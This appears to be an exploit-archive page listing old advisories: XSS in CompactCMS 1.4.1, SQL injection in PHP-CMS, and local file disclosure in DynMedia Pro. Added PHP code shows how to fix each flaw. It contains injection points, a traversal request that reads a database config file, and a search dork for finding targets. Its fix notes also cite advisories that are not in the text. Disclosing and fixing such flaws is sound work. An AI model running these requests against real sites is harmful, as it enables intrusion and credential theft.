/admin/includes/modules/backup-restore/module-management/
/admin/includes/modules/backup-restore/permissions/
/admin/includes/modules/backup-restore/template-editor/
/admin/includes/modules/backup-restore/user-management/
/admin/includes/fancyupload/
/admin/includes/fancyupload/Assets/
/admin/includes/fancyupload/Assets/Icons/
/admin/includes/fancyupload/Backend/
/admin/includes/fancyupload/Backend/Assets/
/admin/includes/fancyupload/Backend/Assets/getid3/
/admin/includes/fancyupload/Language/
/admin/includes/fancyupload/Source/
/admin/includes/fancyupload/Source/Uploader/
/admin/includes/edit_area/
/admin/includes/edit_area/images/
/admin/includes/edit_area/langs/
/admin/includes/edit_area/reg_syntax/
/admin/img/mochaui/
/admin/img/styles/
/admin/img/uploader/
/_docs/
... Perhaps more, but this should give an idea. :-)
--- Cross-Site Scripting Vulnerabilities (XSS) ---
/afdrukken.php?page=">[XSS]
This can be found on line 48:
<strong><a href="<?php echo $ccms['rootdir'];?><?php echo ($_GET['page']!=$cfg['homepage'])?$_GET['page'].'.html':null; ?>"><?php echo $ccms['lang']['system']['tooriginal']; ?></a></strong>
Vuln: $_GET['page']
---
/admin/includes/modules/permissions/permissions.Manage.php?status=notice&msg=[XSS]
This can be found on line 62:
<?php if(isset($_GET['msg'])) { echo '<span class="ss_sprite ss_confirm">'.$_GET['msg'].'</span>'; } ?>
Vuln: $_GET['msg']
---
/lib/includes/auth.inc.php
Username input field (userName) has an XSS vulnerability when using POST data.
This can be found on line 119:
<label for="userName"><?php echo $ccms['lang']['login']['username']; ?></label><input type="text" class="alt title" autofocus placeholder="username" name="userName" style="width:300px;" value="<?php echo (!empty($_POST['userName'])?$_POST['userName']:null);?>" id="userName" />
Vuln: $_POST['userName']
CompactCMS version 1.4.1 suffers from cross site scripting and file disclosure vulnerabilities.
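The three lines quoted in the advisory each echo a request value straight into HTML: once into an href attribute, once into element text, once into a value attribute. As an added example, not CompactCMS code, the same markup produced through one output encoder per context; $ccms, $cfg and the language strings are assumed to be the arrays the quoted lines reference.

```php
<?php
declare(strict_types=1);

// Added example, not CompactCMS code. $ccms, $cfg and the language strings
// are assumed to be the arrays referenced by the lines quoted in the advisory.

/** Encoder for HTML text and for double-quoted attribute values. */
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/**
 * afdrukken.php line 48 equivalent. The page name becomes a URL path
 * segment, so it is percent-encoded first and attribute-encoded second.
 */
function original_link(array $ccms, array $cfg, string $page): string
{
    $path = ($page !== $cfg['homepage']) ? rawurlencode($page) . '.html' : '';
    return '<strong><a href="' . h($ccms['rootdir'] . $path) . '">'
         . h($ccms['lang']['system']['tooriginal']) . '</a></strong>';
}

/** permissions.Manage.php line 62 equivalent: element text context. */
function notice(?string $msg): string
{
    return $msg === null ? '' : '<span class="ss_sprite ss_confirm">' . h($msg) . '</span>';
}

/** auth.inc.php line 119 equivalent: the submitted name is re-displayed encoded. */
function username_field(array $ccms, ?string $userName): string
{
    return '<label for="userName">' . h($ccms['lang']['login']['username']) . '</label>'
         . '<input type="text" class="alt title" autofocus placeholder="username" name="userName"'
         . ' style="width:300px;" value="' . h($userName ?? '') . '" id="userName" />';
}

// Constructed sample data and a constructed payload: the markup comes out as inert text.
$ccms = [
    'rootdir' => '/',
    'lang'    => ['system' => ['tooriginal' => 'Back to original'],
                  'login'  => ['username' => 'Username']],
];
$cfg = ['homepage' => 'home'];

echo original_link($ccms, $cfg, '"><script>alert(1)</script>'), "\n";
echo notice($_GET['msg'] ?? null), "\n";
echo username_field($ccms, $_POST['userName'] ?? null), "\n";
```

The discipline is per context, not per input: the same value needs rawurlencode() when it becomes part of a URL and htmlspecialchars() when it lands in HTML, and the two are applied in that order.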
ThunDEr HeaD/PHP-CMS 1.2 / 3.0 SQL Injection
#########################################################################
[+] Exploit Title : content Management PHPCMS 3.0 [ Sql Injection Vulnerability ]
[~] Author : ThunDEr HeaD
[~] Contact : thunderhead10@gmail.com
[~] Date : 11-01-2011
[~] HomePage : www.indishell.in
[~] Version : 1.2 , 3.0
[~] Tested on : PBL Technology
[~] Vulnerability Style : PHPCMS [ Sql Injection Vulnerability ]
#########################################################################
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
<3 Love: -[SiLeNtp0is0n]-, stRaNgEr(lucky), inX_rOot, NEO H4cK3R, DarkL00k,
Th3 RDX, G00g!3 W@rr!0r, Mahi ,
eXeSoul, str1k3r, co0Lt04d , ATUL DWIVEDI , Jackh4xor
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
......\m/ INDIAN CYBER ARMY \m/......
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Vulnerability:
*SQL injection Vulnerability*
[#] http://server/cms.php?categoryid=10
[#] http://server/cms.php?categoryid=[SQLi]
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=> PROUD TO BE AN INDIAN | Anything for INDIA | JAI-HIND | Maa Tujhe Salam
=> c0d3 for motherland, h4ck for motherland
Enj0y! :D
[#] DOne now time to rock \m/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Bug discovered : 11 feb 2011
finish(0);
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
#End 0Day#
PHP-CMS versions 1.2 and 3.0 suffer from a remote SQL injection vulnerability.
Mbah Semar/DynMedia Pro Web CMS 4.0 File Disclosure
[!]===========================================================================[!]
[~] DynMedia Pro Web CMS 4.0 | Local File Disclosure Exploit
[~] Author : Mbah_Semar (fuji@undiphacker.net)
[~] Homepage : http://www.indonesianhacker.or.id | http://suramcrew.org | http://www.masfuji.us
[~] Date : 22 April, 2010
[!]===========================================================================[!]
[ Software Information ]
[+] Vendor : http://www.vinyadmedia.com
[+] License : Commercial
[+] Vulnerability : Local File Disclosure
[+] Dork : "Powered by Vinyad dynMedia Pro 4.0"
[+] Version : 4.0
[!]===========================================================================[!]
[ Vulnerable File ]
http://www.example.com/downloadfile.php?dwnfile=[LFD]
[ Example ]
http://www.example.com/downloadfile.php?dwnfile=../library/dbconnect.php
[!]===========================================================================[!]
[ Thanks TO ]
[+] Indonesian Hacker Team
[+] Virgi aka Bl4ck_b0x, gisa maho, Lukas Ranger Zero-Line, Aanz, Angga,
riv182, sudden_death, alusius, and you.
[+] All the Suram folks wherever they are, who cannot be named one by one
[ NOTE ]
[+] Please give me an offering of black coffee and Gudang Garam International cigarettes
DynMedia Pro Web CMS version 4.0 suffers from a local file disclosure vulnerability.
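The W-CMS p, Exponent CMS module, Free Simple CMS include and DynMedia dwnfile parameters listed on this page all turn a request value into a filesystem path, which is why "../" sequences (and, in the Exponent PoC, a trailing %00) reach files outside the web root. As an added example, not code from any of those products, two ways to take a file name from a request safely: an allow-list for the fixed set of includable pages, and realpath() confinement for a download directory whose contents change. The directory names and the page table are assumptions.

```php
<?php
declare(strict_types=1);

// Added example, not code from W-CMS, Exponent CMS, Free Simple CMS or DynMedia.
// PAGE_DIR, DOWNLOAD_DIR and the page table are assumptions for the illustration.

const PAGE_DIR     = __DIR__ . '/pages';
const DOWNLOAD_DIR = __DIR__ . '/files';

/**
 * Allow-list: the request supplies a key, never a path. Anything not in the
 * table, including "../x" or "x%00", is simply unknown.
 */
function resolve_page(string $requested): ?string
{
    static $pages = [
        'home'    => 'home.php',
        'about'   => 'about.php',
        'contact' => 'contact.php',
    ];
    return isset($pages[$requested]) ? PAGE_DIR . '/' . $pages[$requested] : null;
}

/**
 * Confinement: canonicalise the requested name and require the result to
 * sit under $baseDir. Returns the absolute path or null when rejected.
 */
function resolve_download(string $requested, string $baseDir = DOWNLOAD_DIR): ?string
{
    // An empty name or an embedded NUL byte is never a valid file name.
    if ($requested === '' || strpos($requested, "\0") !== false) {
        return null;
    }
    // Accept a bare file name only: no separators of either kind (basename()
    // alone does not treat '\' as a separator on Linux, hence strpbrk()).
    if (basename($requested) !== $requested || strpbrk($requested, "/\\") !== false) {
        return null;
    }
    $base = realpath($baseDir);
    $real = realpath($baseDir . DIRECTORY_SEPARATOR . $requested);
    if ($base === false || $real === false) {
        return null;                       // base missing, or the file does not exist
    }
    // realpath() has resolved "..", "." and symlinks; the result must still be
    // below the base directory (the trailing separator defeats "/files2" prefixes).
    if (strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return is_file($real) ? $real : null;
}

// Usage in request handlers.
$page = resolve_page($_GET['p'] ?? 'home');
if ($page === null) {
    http_response_code(404);
    exit('No such page');
}
require $page;

$file = resolve_download($_GET['dwnfile'] ?? '');
if ($file === null) {
    http_response_code(404);
    exit('No such file');
}
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . basename($file) . '"');
readfile($file);
```

The allow-list is preferable wherever the set of targets is known at deploy time. The realpath() route is the fallback for user-managed content, and its two checks are both needed: the name filter blocks the obvious traversal, and the canonical prefix comparison catches what a symlink inside the directory or a ".." that the filter missed would otherwise reach.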